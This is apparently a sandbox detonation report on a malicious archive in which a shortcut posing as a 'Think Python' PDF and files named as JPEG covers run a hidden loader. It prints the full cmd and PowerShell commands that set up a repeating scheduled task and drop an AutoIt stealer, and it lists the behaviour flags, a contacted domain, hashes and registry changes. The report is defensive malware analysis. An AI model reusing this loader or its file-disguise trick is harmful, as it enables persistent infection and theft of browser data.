--content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=D68E1A1A1BD3075D9F09F3948916AA09 --renderer-client-id=7 --mojo-platform-channel-handle=2300 --allow-no-sandbox-job /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 144.96.55.23.in-addr.arpa udp
US 8.8.8.8:53 59.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 138.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 b30d3becc8731792523d599d949e63f5
SHA1 19350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256 b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512 523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 752a1f26b18748311b691c7d8fc20633
SHA1 c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256 111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512 a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 c4b1b7f7953c859543fab249c14664b8
SHA1 b6826c3ec038238834617a0206535a038ff6469f
SHA256 44917e4f454077cf7c33514516d3931acd7a33915cea3eb923f2d1e868b6ab19
SHA512 91a317cf9725c0352d7e5158cc6e27df02505539290942275cd52ea5cea1a8dea41b34887c940ddb67b648cfe4bea8c170f06853467ddb278ee4f857db75ee38

Analysis: behavioral12

Detonation Overview

Submitted

2024-06-12 05:58

Reported

2024-06-12 06:00

Platform

win10v2004-20240508-en

Max time kernel

51s

Max time network

52s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe

"C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-12 05:58

Reported

2024-06-12 06:00

Platform

win10v2004-20240508-en

Max time kernel

147s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe

"C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe"

Network

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-06-12 05:58

Reported

2024-06-12 06:00

Platform

win7-20240220-en

Max time kernel

122s

Max time network

123s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\A-Think Python How to Think Like a Computer Scientist, 3rd Edition (True PDF).lnk"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\A-Think Python How to Think Like a Computer Scientist, 3rd Edition (True PDF).lnk"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c for /f "tokens=*" %i in ('dir /b MyCover4.jpg') do @for /f "delims=" %j in (%i) do @%j

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c dir /b MyCover4.jpg

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -noprofile -noninteractive -ExecutionPolicy Bypass sleep 2 ; try{$Lq546qzs = New-Object -ComObject Schedule.Service ; $Plqkjsd ="(Get-CimInstance -ClassName Win32_DiskDrive).Size | Measure-Object -Sum | Select-Object -ExpandProperty Sum"; $Lq546qzs.Connect() ; $MASK = $Lq546qzs.NewTask(0) ; $reginfo = $MASK.RegistrationInfo ;$reginfo.Description = '' ; $reginfo.Author = '' ; $iosdfiu5s = $MASK.Principal; $iosdfiu5s.LogonType = 3 ; $esf5s = $MASK.settings ; $esf5s.Enabled = $true ; $esf5s.StartWhenAvailable = $true ; $esf5s.Hidden = $false ; $esf5s.DisallowStartIfOnBatteries = $false ; $esf5s.StopIfGoingOnBatteries = $false ; $esf5s.MultipleInstances = 2 ; $esf5s.ExecutionTimeLimit = """PT0H""" ; $sqdf = $MASK.Triggers.Create(9); $sqdf.Enabled = $true; $sqdf.Id = """LogonTriggerId"""; $sqdf.Repetition.Interval = """PT5M"""; $sqdf.Repetition.StopAtDurationEnd = $false; $activationTime = (Get-Date).AddMinutes(3); $sqdf.StartBoundary = $activationTime.ToString('yyyy-MM-ddTHH:mm:ss'); $currentUser = [System.Security.Principal.WindowsIdentity]::GetCurrent(); $sqdf.UserId = $currentUser.Name; $poqsdjkpoqj5qs5=$MASK.Triggers.Create(2) ; $poqsdjkpoqj5qs5.Enabled=$true ; $poqsdjkpoqj5qs5.Repetition.Interval="""PT10M""" ;$poqsdjkpoqj5qs5.Repetition.StopAtDurationEnd=$false ; $poqsdjkpoqj5qs5.Id="""DailyTriggerId""" ; $poqsdjkpoqj5qs5.StartBoundary = (Get-Date).AddMinutes(1).tostring('yyyy-MM-ddTHH:mm:ss'); $action_ = $MASK.Actions.Create(0) ; $action_.Path = '"""%appdata%\Microsoft\Windows\AutoIt3.exe"""' ; $action_.Arguments = '/ErrorStdOut """%appdata%\Microsoft\Windows\' + $Plqkjsd + '.au3""""'; $Lq546qzs.GetFolder("""\\""").RegisterTaskDefinition("""$Plqkjsd""", $MASK, 6 , $null, $null, 3) ;$Pllds = \"$env:APPDATA\Microsoft\Windows\"; Copy-Item MyCover2.jpeg \"$Pllds\$Plqkjsd.au3\"; Copy-Item MyCover3.jpeg \"$Pllds\AutoIt3.exe\" } Catch [System.Exception]{};"

C:\Windows\system32\attrib.exe

attrib -h -s /s /d

Network

N/A

Files

memory/2588-40-0x0000000002D00000-0x0000000002D80000-memory.dmp

memory/2588-41-0x000000001B640000-0x000000001B922000-memory.dmp

memory/2588-42-0x0000000002070000-0x0000000002078000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-06-12 05:58

Reported

2024-06-12 06:00

Platform

win10v2004-20240508-en

Max time kernel

142s

Max time network

147s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\A-Think Python How to Think Like a Computer Scientist, 3rd Edition (True PDF).lnk"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A

Reads user/profile data of web browsers

spyware stealer

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4960 wrote to memory of 2136 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\cmd.exe
PID 2136 wrote to memory of 3360 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 2136 wrote to memory of 2876 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2136 wrote to memory of 3132 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\attrib.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\A-Think Python How to Think Like a Computer Scientist, 3rd Edition (True PDF).lnk"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c for /f "tokens=*" %i in ('dir /b MyCover4.jpg') do @for /f "delims=" %j in (%i) do @%j

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c dir /b MyCover4.jpg

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -noprofile -noninteractive -ExecutionPolicy Bypass sleep 2 ; try{$Lq546qzs = New-Object -ComObject Schedule.Service ; $Plqkjsd ="(Get-CimInstance -ClassName Win32_DiskDrive).Size | Measure-Object -Sum | Select-Object -ExpandProperty Sum"; $Lq546qzs.Connect() ; $MASK = $Lq546qzs.NewTask(0) ; $reginfo = $MASK.RegistrationInfo ;$reginfo.Description = '' ; $reginfo.Author = '' ; $iosdfiu5s = $MASK.Principal; $iosdfiu5s.LogonType = 3 ; $esf5s = $MASK.settings ; $esf5s.Enabled = $true ; $esf5s.StartWhenAvailable = $true ; $esf5s.Hidden = $false ; $esf5s.DisallowStartIfOnBatteries = $false ; $esf5s.StopIfGoingOnBatteries = $false ; $esf5s.MultipleInstances = 2 ; $esf5s.ExecutionTimeLimit = """PT0H""" ; $sqdf = $MASK.Triggers.Create(9); $sqdf.Enabled = $true; $sqdf.Id = """LogonTriggerId"""; $sqdf.Repetition.Interval = """PT5M"""; $sqdf.Repetition.StopAtDurationEnd = $false; $activationTime = (Get-Date).AddMinutes(3); $sqdf.StartBoundary = $activationTime.ToString('yyyy-MM-ddTHH:mm:ss'); $currentUser = [System.Security.Principal.WindowsIdentity]::GetCurrent(); $sqdf.UserId = $currentUser.Name; $poqsdjkpoqj5qs5=$MASK.Triggers.Create(2) ; $poqsdjkpoqj5qs5.Enabled=$true ; $poqsdjkpoqj5qs5.Repetition.Interval="""PT10M""" ;$poqsdjkpoqj5qs5.Repetition.StopAtDurationEnd=$false ; $poqsdjkpoqj5qs5.Id="""DailyTriggerId""" ; $poqsdjkpoqj5qs5.StartBoundary = (Get-Date).AddMinutes(1).tostring('yyyy-MM-ddTHH:mm:ss'); $action_ = $MASK.Actions.Create(0) ; $action_.Path = '"""%appdata%\Microsoft\Windows\AutoIt3.exe"""' ; $action_.Arguments = '/ErrorStdOut """%appdata%\Microsoft\Windows\' + $Plqkjsd + '.au3""""'; $Lq546qzs.GetFolder("""\\""").RegisterTaskDefinition("""$Plqkjsd""", $MASK, 6 , $null, $null, 3) ;$Pllds = \"$env:APPDATA\Microsoft\Windows\"; Copy-Item MyCover2.jpeg \"$Pllds\$Plqkjsd.au3\"; Copy-Item MyCover3.jpeg \"$Pllds\AutoIt3.exe\" } Catch [System.Exception]{};"

C:\Windows\system32\attrib.exe

attrib -h -s /s /d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe /ErrorStdOut "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\274872407040.au3"

Network

Country Destination Domain Proto
US 8.8.8.8:53 borcano.org udp

Files

memory/2876-0-0x00007FFEFAD13000-0x00007FFEFAD15000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_izy40021.fnr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82


C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AutoIt3.exe

MD5 0adb9b817f1df7807576c2d7068dd931
SHA1 4a1b94a9a5113106f40cd8ea724703734d15f118
SHA256 98e4f904f7de1644e519d09371b8afcbbf40ff3bd56d76ce4df48479a4ab884b
SHA512 883aa88f2dba4214bb534fbdaf69712127357a3d0f5666667525db3c1fa351598f067068dfc9e7c7a45fed4248d7dca729ba4f75764341e47048429f9ca8846a

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\274872407040.au3

MD5 fa26096b95742e002aaa28f5add10d15
SHA1 27411586e4b2082750df480d9725c535f86b8f4c
SHA256 dce814637339057cd26d594d6b1dafad71f805d596f4c0dd3d6707136a7e4eaf
SHA512 2699af7e5435fc7b8e4b774690592f499f43a5420a005c2379ee343e038d4a5b723f0912ea1e3c03c1670ef01582ff90198010adfcf0cb263ee3115c1c75f57f

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-12 05:58

Reported

2024-06-12 06:00

Platform

win7-20240508-en

Max time kernel

118s

Max time network

119s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\ExtractAll\A-Think Python How to Think Like a Computer Scientist, 3rd Edition (True PDF).lnk"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\ExtractAll\A-Think Python How to Think Like a Computer Scientist, 3rd Edition (True PDF).lnk"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c for /f "tokens=*" %i in ('dir /b MyCover4.jpg') do @for /f "delims=" %j in (%i) do @%j

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c dir /b MyCover4.jpg

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

